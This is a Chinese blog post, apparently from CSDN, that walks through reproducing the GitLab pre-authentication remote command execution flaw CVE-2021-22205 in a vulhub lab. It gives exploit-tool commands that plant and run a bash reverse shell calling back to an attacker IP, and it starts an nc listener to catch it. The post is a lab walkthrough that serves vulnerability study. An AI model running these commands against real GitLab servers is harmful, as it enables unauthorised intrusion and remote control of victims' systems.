GitLab 预身份验证远程命令执行 (CVE-2021-22205)

最新推荐文章于 2024-07-13 11:41:10 发布
最新推荐文章于 2024-07-13 11:41:10 发布
阅读量340 收藏 9
点赞数 5
文章标签: gitlab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65354386/article/details/140220623
版权

漏洞介绍:GitLab 是一个基于 Web 的 DevOps 生命周期工具,它提供了一个 Git 存储库管理器,提供 wiki、问题跟踪以及持续集成和部署管道功能。

在 GitLab CE/EE 中发现影响 11.9 开始版本的问题。GitLab 未正确验证传递给文件解析器的图像文件,从而导致未经身份验证的远程命令执行。

实验步骤

环境搭建

漏洞环境使用vulhub搭建,漏洞目录为 vulhub/gitlab/CVE-2021-22205/

拉取镜像启动容器:docker-compose up -d

查看端口:docker ps

环境启动后,访问http://IP:8080即可查看到GitLab的登录页面

下载漏洞利用需要的工具并放入攻击机中:

vulhub/gitlab/CVE-2021-22205/poc.py at master · vulhub/vulhub · GitHub

使用poc.py来测试漏洞,在/tmp路径下创建一个success文件:

python poc.py http://your-ip:8080 "touch /tmp/success

回到靶机进入容器可以看到touch /tmp/success已成功执行

漏洞利用

下载工具并放入攻击机:https://github.com/Al1ex/CVE-2021-22205

检查目标是否存在漏洞:python CVE-2021-22205.py -v true -t http://192.168.150.144:8080

在攻击机上利用该工具在目标服务器内写入反弹shell脚本:

python CVE-2021-22205.py -a true -t http://192.168.150.144:8080/ -c "echo 'bash -i >& /dev/tcp/192.168.150.145/6666 0>&1' > /tmp/shell.sh"

回到靶机进入容器可以看到查看shell脚本创建成功

在攻击机上执行命令修改shell.sh权限使其可执行:

python CVE-2021-22205.py -a true -t http://192.168.150.144:8080/ -c "chmod +x /tmp/shell.sh"

攻击机上开启端口监听:nc -lvvp 6666

在攻击机上执行命令使shell.sh文件在目标主机上运行:

python CVE-2021-22205.py -a true -t http://192.168.150.144:8080/ -c "/bin/bash /tmp/shell.sh"

执行脚本后,可以在监听端口中观察到反弹shell成功

火爆的后槽牙-
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
GitLab 远程命令执行漏洞复现CVE-2021-22205
weixin_59086772的博客
01-10 1384
雨笋教育小编今天分享我们工程师发布的关于GitLab 远程命令执行漏洞复现的一篇技术干货,分享给你们一起学习。 GitLab 官方发布安全补丁更新修复了GitLab命令执行漏洞(CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,影响了从 11.9 开始的版本。 0x00漏洞描述 GitLa
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-2021-25735:利用CVE-2021-25735
05-14
利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像,使用以下命令...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
gitlab 备份和还原
羽之大公公的博客
07-12 183
使用以上命令会在/var/opt/gitlab/backups目录下创建一个名称类似为*backup.tar的压缩包,#备份保存时间,超过事件覆盖掉;
Centos7 安装私有 Gitlab
专注基础架构领域
07-12 180
在 CentOS 7上,下面的命令也会在系统防火墙中打开 HTTP、HTTPS 和 SSH 访问。这是一个可选步骤,如果您打算仅从本地网络访问极狐GitLab,则可以跳过它。(可选)下一步,安装 Postfix 以发送电子邮件通知。如果您想使用其他解决方案发送电子邮件,请跳过此步骤并在安装极狐GitLab 后。
极狐Gitlab使用(1)
Lzcsfg的博客
07-10 772
极狐(JiHu)GitLab 是一个基于 GitLab 的定制版本,专门针对中国用户进行了优化和定制。它通常包含了一些适应中国特殊网络环境的调整,比如加速访问和稳定性优化等。使用极狐 GitLab 与标准 GitLab 的主要区别在于性能和网络访问方面的改进。
持续集成/持续部署(CI/CD)工具:Jenkins、GitLab CI等工具的使用
weixin_39372311的博客
07-12 1126
持续集成/持续部署(CI/CD)是一种重要的实践,可以帮助我们提高软件质量、加快开发速度和降低风险。通过使用Jenkins、GitLab CI等CI/CD工具,我们可以自动化软件构建、测试和部署过程,实现快速交付和迭代。通过遵循最佳实践,我们可以更有效地使用CI/CD工具,提高自动化和配置管理的效率。
Gitlab介绍
Andy的博客
07-13 441
Gitlab介绍
gitlab 搭建使用
07-12 1101
把用户主机上/root/.ssh/id_rsa.pub 里面的公钥复制到下图1的位置,如果没有此文件,先ssh-keygen生成。上面报错是因为此用户权限是developer,无法创建分支,可以用管理员账户把tom用户权限调整为owner.密码:/etc/gitlab/initial_root_password文件中的Password字段值。注意:执行恢复命令的时候,备份文件的名字去除_gitlab_backup.tar,只要前面的部分。已经可以看到代码的分支,标签,提交记录。#查看gitlab状态。
公司内部配置GitLab,通过SSH密钥来实现免密clone、push等操作
qq_40600379的博客
07-10 472
公司内部配置GitLab,通过SSH密钥来实现免密clone、push等操作。
Docker部署gitlab私有仓库后查看root默认密码以及修改external_url路径和端口的方法
tigerhhzz的博客
07-10 367
刷新gitlab,查看ssh和http地址,ip和端口已经完整显示了;
如何从gitlab删除仓库
weixin_45754647的博客
07-12 315
在“高级设置”里,找到“删除项目”(delete project)的部分。在“常规”设置页面,滚动至最底部,找到“高级设置”(Advanced settings)部分。今天发现gitlab上有些仓库的代码没有用,是个多余的仓库,想要删掉,经过一番操作之后,成功的删除了,git上没有。在项目页面,向下滚动,找到左侧菜单栏中的“设置”(Settings),点击进入,然后进入“常规”(General)选项。
Gitlab CI/CD介绍
弘毅_hao的博客
07-11 368
Gitlab CI/CD介绍
GitLab和Git
m0_57968888的博客
07-10 992
git config --global color.ui true //让git显示颜色//忽略特殊文件//.gitignore文件# Windows:Thumbs.db# Python:*.py[cod]*.so*.egg*.egg-infodistbuilddb.ini//把该文件也提交到git$ git add -f App.class //强制添加被忽略的特殊文件$ git check-ignore -v App.class //检查哪个规则出错。
极狐Gitlab使用(2)
Lzcsfg的博客
07-11 686
一般会将老服务器/data/gitlab/backups目录下的备份文件拷贝到新服务器上的/data/gitlab/backups去恢复,这里实验环境就在本机做恢复了。注意这里BACKUP=后面的文件名,在较新的版本中,不可以使用全名,_gitlab_backup.tarh会自动加上,所以这里文件名后面那点就不能再写了。登录web页面,随便登录一个用户,在之前我们用的随便填的邮箱格式,现在我们修改成自己真实的邮箱进行测试我们的邮箱配置。该项定义了默认备份出文件的路径,可以通过修改该配置,并执行
matlab下载.pdf
最新发布
07-14
matlab下载下载方式及注意事项
CVE-2021-22205
08-09
CVE-2021-22205是一个与GitLab CE/EE相关的漏洞。根据引用和引用的信息,可以使用python脚本CVE-2021-22205.py来进行批量检测和利用该漏洞。通过运行命令"python3 CVE-2021-22205.py -s true -f target.txt"可以检测目标机器是否存在该漏洞,而通过命令"python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c command"可以利用该漏洞执行命令。引用提供了一个反弹shell的示例操作,通过执行一系列命令来实现反向连接并获取shell访问。请注意,此漏洞可能会导致安全风险,请在合法授权的情况下使用该工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值